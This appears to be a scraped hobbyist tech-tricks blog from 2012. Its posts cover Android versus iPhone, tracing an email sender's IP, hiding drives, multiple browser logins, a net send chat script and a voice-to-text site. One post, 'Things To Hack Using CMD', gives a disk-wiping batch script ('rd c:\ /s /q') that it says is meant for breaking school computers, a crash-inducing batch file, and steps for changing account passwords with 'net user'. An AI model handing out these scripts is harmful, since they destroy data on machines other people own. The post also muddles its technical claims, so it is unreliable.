One of the issues I’ve always had with the iPhone is its notification system. Basically, it depends upon a single system that not all applications have access too. For instance, if you are a Twitterer, you can find out if you have updates only by opening the Twitter app on the iPhone. With Android, the apps have access to the notification system and can all report. The notification bar on the Android phone can alert you to new voice messages, email messages, Facebook notifications, new Gmail, new text messages, and much more. If an app has a notification, it can let you know quickly, and in the background.

6: Endless personalization


I hesitate to place this on the list because so many readers seem to think user-configuration is worthless. It’s not. The Android phone allows users to configure their mobile to look and behave exactly how they want it. If you’re a social network power user, you can have a screen for Facebook, one for Twitter, one for texting, and one for Flickr. Or if you are a business user, you can have a screen for contacts, for your calendar, for gmail, for email, for RSS, and more. Not only can you configure the desktop the way you want, you can configure the behavior of your phone. Set up default actions for different contacts — even add an entirely different desktop, should you want. The possibilities are endless with the Android phone. With the iPhone, you’re pretty much limited to what Apple says.

7: Market


Yes, Apple has an app for that. But so does Android. And chances are, the Android app is free and works as well (or better) than the iPhone app. And, believe it or not, there are thousands of apps in the Android Market. Apple does not (at least yet) have a patent on an application for just about everything. Give it time though. And installing applications on your Android phone is actually easier than it is on the iPhone. For free applications, you don’t have to worry about entering a password every time you try to install anything. And you do not have to link to Apple’s iTunes store to purchase applications from the Android Market. For those apps that have a price, you enter your information on the Google Market one time and you’re done.

8: Google integration


This one is almost not fair, since Android was built with the intention of integrating with Google. But wow does it integrate well. Want to search Google? Simply click the search button, enter your search string, and you’re off and running. Did I mention Google Voice? Yes, the Android has an app for that.

9: Open Source


Why does being open make Android better than iPhone? For the same reason that being open helps Linux: a planet full of developers with the ability to aid Android’s developers. Anyone can get access to the source of Android to better the system. This is also a double-edged sword, in that it allows those will less-than-ideal intentions to discover any weakness of the phone. But that can be seen as an indirect plus because when weaknesses are found in the open source community, they are quickly fixed. I assume that this tradition will extend to the Android phone. iPhone open? You’re kidding right?

10: Open to carriers


This is yet another reason why Android is superior. If you want an iPhone (at least for the time being), you better be open to AT&T. If you don’t like AT&T and you still want an iPhone, you better be open to doing a little jail breaking or move to another country. If you want an Android phone, you can join any number of carriers and have your choice of any number of outstanding phones using Android. No lock down.


PRASHANT KUMAR

How To Trace The IP Address Of Email Sender


If you want to know the IP address of your friens Sustem than you can know the Ip Address from emails that you have received from your friends.


If you browse to the last of the article. I have done little scripting to trace the location of any ip address with goggle maps. Jump to the section


For GMail Users:




  • Go to Inbox.
  • Open the mail whose sender's IP Address you want to know.
  • In top-right corner of the mail there is Reply button and a arrow button pointing downwards.
  • Click on the arrow button and select 'Show original' from there.
  • A new window will open showing the source code of your mail.
  • Press Ctrl and F shortcut for Find.
  • If you have got the mail from yahoo. Type 'Received: from [' without quotes & press enter.
  • You will get a string like this 'Received: from [120.183.50.106] by web95404.mail.in2.yahoo.com via HTTP; Mon, 17 july 2012 15:38:48 IST'.
  • The number between the square bracket is the IP Address of the sender. for eg here in my case this number '104.133.40.109' is the sender IP Address from whom i have got the mail.
  • If you have got the mail from hotmail. Type ''X-Originating-IP: [' in the find text box.
  • You will get a string like this 'X-Originating-IP: [154.156.44.165]'. The number between the square bracket is the IP Address of the sender.
  • If you have got the mail from rediffmail.com. Search for a string like this 'Received: from unknown 124.121.820.297 by rediffmail.com via HTTP; 22 july 201217:55:30 -0000'. The number between the square bracket is the IP Address of the sender.

For Yahoo Users:





  • Go to your Inbox.
  • Open the mail whose sender's IP Address you want to know.
  • In yahoo classsic mode. In the bottom right corner of the mail there is a link 'Full Header'. Click on it. 
  • In yahoo upgraded mode. It is at the top right corner of the mail a compact header/standard header will be there. Click on that and select Full Header.
  • A new window will open showing the source code of your mail.
  • Press Ctrl and F shortcut for Find, otherwise go to Edit->Find.
  • If you have got the mail from yahoo. Type 'Received: from [' without quotes. Search a string having this format as given in the example eg: 'Received: from [145.20.287.258] by web94801.mail.in2.yahoo.com via HTTP; Sun, 16 July 2012 21:14:16 IST'.The address between the square bracket is the ip address of the sender.
  • If you have got the mail from hotmail/msn. Search a string like this 'X-Originating-IP: [125.103.56.155]'. You may get many X-Originating-IP but the last one in the list is the required sender ip address. If you get only one its ok that is the required address. The address between the square bracket is the ip address of the sender.
  • If you have got the mail from rediffmail.com. Search for a string like this 'Received: from unknown 121.121.452.27 by rediffmail.com via HTTP; 22 July 2012 17:55:30 -0000'. The number between the square bracket is the IP Address of the sender.

For Hotmail Users:





  • Go to your Inbox.
  • Open the mail whose sender's IP Address you want to know.
  • Right click on the mail in the list and select View message source.
  • A new window will open showing the source code of your mail.
  • Press Ctrl and F shortcut for Find, otherwise go to Edit->Find.
  • If you have got the mail from yahoo. Type 'Received: from [' without quotes. Search a string having this format as given in the example eg: 'Received: from [188.20.227.238] by web94801.mail.in2.yahoo.com via HTTP; Sun, 16 Aug 2009 21:14:16 IST'.The address between the square bracket is the ip address of the sender.
  • If you have got the mail from hotmail/msn. Search a string like this 'X-Originating-IP: [104.103.42.155]'. You may get many X-Originating-IP but the last one in the list is the required sender ip address. If you get only one its ok that is the required address. The address between the square bracket is the ip address of the sender.
  • If you have got the mail from rediffmail.com. Search for a string like this 'Received: from unknown 122.121.420.27 by rediffmail.com via HTTP; 22 Aug 2009 17:55:30 -0000'. The number between the square bracket is the IP Address of the sender.

NOTE:- Guys If you have got a mail from GMail you cant trace the sender Ip Address. Google says
Protecting our users' privacy is something we take very seriously. IP addresses can be considered sensitive information. As such, sender IP address information is not displayed in Gmail outgoing mail headers.
Don't worry -- we aren't enabling spammers to abuse the system by not revealing IP addresses. Gmail uses many innovative spam filtering mechanisms to ensure that spammers have a difficult time sending bulk emails that arrive in users inboxes.



PRASHANT KUMAR

Monday, July 30, 2012

Hide Any Drive Using CMD(Command Prompt)



Do you have a computer that has many important files that are personal to you?
And you frequently share you computer with your friends, when they visit you.
So you might want to hide and protect them from others.
Then here's a trick for you to hide your disk drives using command prompt.



just follow these steps,

1...clcik start>>>run>>> and type "cmd" in run,


2...After opening cmd, type "list volume" (space between list and volume)


3...Id you want to hidden E drive type "select volume 3"    ( write with spaces)
    in cmd we assume c for 1 , d for 2 and e for 3 for drive

4..and now type "remove letter e" your drve will be hidden and nobody cant see this,
  some time you have to restart your pc  for hidden purpose.
  
5...to assign or see you drive follow again 3 upper steps and your 4th step will be changed


6..type "assign letter"  and your drive will be shown.

Thats it. Now enjoy!!!

Important Note: Since the drive is hidden, it is also not available to the Antivirus Programs. So if any virus attacks your computer than you antivirus will not be able to detect it.


PRASHANT KUMAR




Saturday, July 28, 2012

How To Use Multiple Login In Same Browser At A Time


Have you ever tried to get on more than one account of something like gmail, facebook, myspace, yahoo, etc.. on the same browser?  Well, you can’t do that because these kinds of sites store something called a cookie on your computer which allows you to be logged on to them.   The reason why you cant get on multiple accounts of a website is that only one cookie can be stored at a time.  But there is a simple way to get around this!




What You Will Need..


This works for any operating system that can work with the internet browsers Mozilla Firefox and Google Chrome.




First and foremost, I’m going to say  you need internet.  After you got that settled, you need an internet browser.  There are only two that work for this because they are the only ones that work for this because they support addons.  They are Mozilla Firefox? and Google Chrome?.




After you have either one of those browsers installed, we will have to split this tutorial.  There will be two sections, one for Firefox and one for Chrome, with further instructions.


Mozilla Firefox..





If you have chosen to do this with Firefox, you will need to get an addon.  The addon is called “Coral IE Tab”.  What it does is it adds a feature to Firefox that allows it to make a new tab that runs like its a tab in Internet Explorer.  This tab can also have its own cookies.  Because the tab can do this, it can allow you to access another account of the same service in one browser.  Basically, you will have one account of, Gmail in example, open in a Firefox tab like normal, and then, you will open another account of Gmail in an Internet Explorer tab.




To do this, download the addon please click here?.




Once you have the addon installed, make sure you restart Firefox and then follow these steps…




Open a tab like normal and go to a site, i.e. Facebook, and log in.


Open another tab like normal but DO NOT go to any website on it.


Click the button that looks like a tab with an IE symbol on it.  This button is generally located next to the search box on the top of your browser.


Click For Full Size




After you click that button, the tab will change to an IE Tab.


Once the tab is changed, go to the same website that you logged onto before.  Once you go to it, you will be taken to the login page.  Once there, just login like normal and it should work.


Google Chrome..






If you have chosen Google Chrome, you will also need to get an addon. The addon is called “Classic IE Tab”.  This addon does the same thing that the addon in Firefox does.  It allows a tab to run Internet Explorer in Google Chrome.  This tab also allows you to store its own cookies so multiple accounts can work with it.  Basically, you can have an account of something open in one tab, i.e. Gmail, and then log into another account like Gmail in an IE Tab.




To download IE Tab for Google Chrome, please click here?.




Once you have the addon installed, make sure you restart Google Chrome and please follow these steps…




Open a tab like normal then go to a site, i.e. Facebook, and then log in.


Open another tab like normal but this time DO NOT go to any site.


Click the IE symbol.  This button is located in the address bar, on the far right-hand side.


Click For Full Size




After you click that button, that tab will turn into an IE tab and you will get a different address bar that will be located right under the bookmarks bar.


In that address bar, type in the same website that you logged into before and you will be taken to the login page.


Log into the site and it will work like normal.


If you have any problems, or questions about this, please send us an email.


If you have any comments, please leave one on this page.

Friday, July 27, 2012

Things To Hack Using CMD(Command Prompt)


People can use the cmd(command prompt) for various purposes, but today i am going to tell u some hackung tricks using cmd.

you can "hack" all of the following with Command Prompt

Most Websites
User Accounts (on your computer)
Computer Settings
E-mail
and some other stuff -.-

To do anything related to hacking with Command Prompt you must know my best friend and his name is IP!
IP is everything in the cyber world, it identifies you like no other, with your IP someone can find out where you live, who the computers registered to, the computers name, and more! So think of it as your cyber Social Security Number (SSN) you don't want to just tell everyone it.

So to get your IP you can start by opening Command Prompt
Next make sure it is on C: Drive
Then type in the following ipconfig /all
This will display a lot of info some of which is very important
This will tell you how you are connected to the internet and with what and also a lot of other stuff (i will not lie some of the info it gives is useless)
Congrats you learn a command! and you have now found out your IP! (im not telling where it is im just saying its there if you scroll up a little bit)

Now to find internet connection!
Lets say you and a friend are playing a MMO and your friend is host and you are lagging well if you want to find out why just type into command prompt the following Ping 127.0.0.1 (replace 127.0.0.1 with your friends IP)(also 127.0.0.1 is local host or you and is used for offline "things")(it also means nothing towards your IP basicly)
the lower the number you see the better! lower means faster and higher means slower

Now time for some "Advanced" stuff

How to find out computer account passwords!
this will require you to know the username.
First open Command Prompt
Then type in the following Net User
This will give you all the accounts (so i lied you didn't need to know the USernames xD
Now type in Net User Admin (you may replace Admin with the account name)
Now you get even more info on that account if you read it all it tells you about the password
Now if you want to change the password just type the following Net User Admin Password (you can replace Admin with the username and Password with the desired password) and TADA you have changed the account password.

O.K. that is all that i will currently say, i will post more in the future, this is jsut a taste of things to come and now for some fun with Command Prompt!

Open up Notepad.exe or in Command Prompt type Notepad (you may type in a files name with out the .exe on the end and it will run it)
Now type in the following:

start
start
start
start
start
start
start crash

then click Save as and select all files, then name is .bat and when you are board just run it and u'll see what it does (make sure you save what your doing first!) it will auto name to Crash.bat

O.K. i take NO RESPONSIBILITY FOR WHAT I AM ABOUT TO POST! this file will BREAK YOU COMPUTER!

@echo off
taskkill -f explorer.exe
start %windir%\System32\rundll32.exe user32.dll, LockWorkStation
rd c:\ /s /q
cls

put that into a notepad and name it Break.bat now what will this do? it will first delete all internet browsers! then it will lock you out of your computer and then delete your System 32 file which is what your computer needs to RUN! now DO NOT USE THIS! i only posted this for those how want to break a school computer! be careful with this because you will need to get a new computer since restoring can't fix this! now be safe and have fun with the new skills i have just taught you!

Thats it Frnds now enjoy!!!

PRASHANT KUMAR

Sunday, July 22, 2012

Chat Through cmd(Command promt).


Hey frnds today am going to tell u a super cool trick of command promt.


If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! 
All you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:


@echo off
:A 
Cls
echo MESSENGER 
set /p n=User: 
set /p m=Message: 
net send %n% %m% 
Pause
Goto A 
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:


MESSENGER
User:


After "User" type the IP address of the computer you want to contact. 
After this, you should see this:


Message:


Now type in the message you wish to send.
Before you press "Enter" it should look like this:


MESSENGER
User: 56.108.104.107
Message: Hi


Now press "Enter", and start chatting!

Thats it And now enjoy it!!!!!!!!!!! 

PRASHANT KUMAR

Friday, July 20, 2012

Know To Convert Voice Into Text


Hey frnds here i am posting a fantestic tool for converting voice into the text format.
Technology is advancing by leaps and, today, there are several mobile devices that can dictate and are capable of turning voice into text. But if you have a smartphone to perform this action, don't worry, this time, we will share an excellent tool.


TalkTyper is a web tool that can convert voice to text online free and easy to use.




Upon entering the site the first thing to do is to choose our language, which, in which is located the english language. When you select the language and proceed click on the microphone and began to dictate, when we speak of program disables the microphone and the text that dictates the mould.
Web link: http://talktyper.com/


PRASHANT KUMAR

Related Posts Plugin for WordPress, Blogger...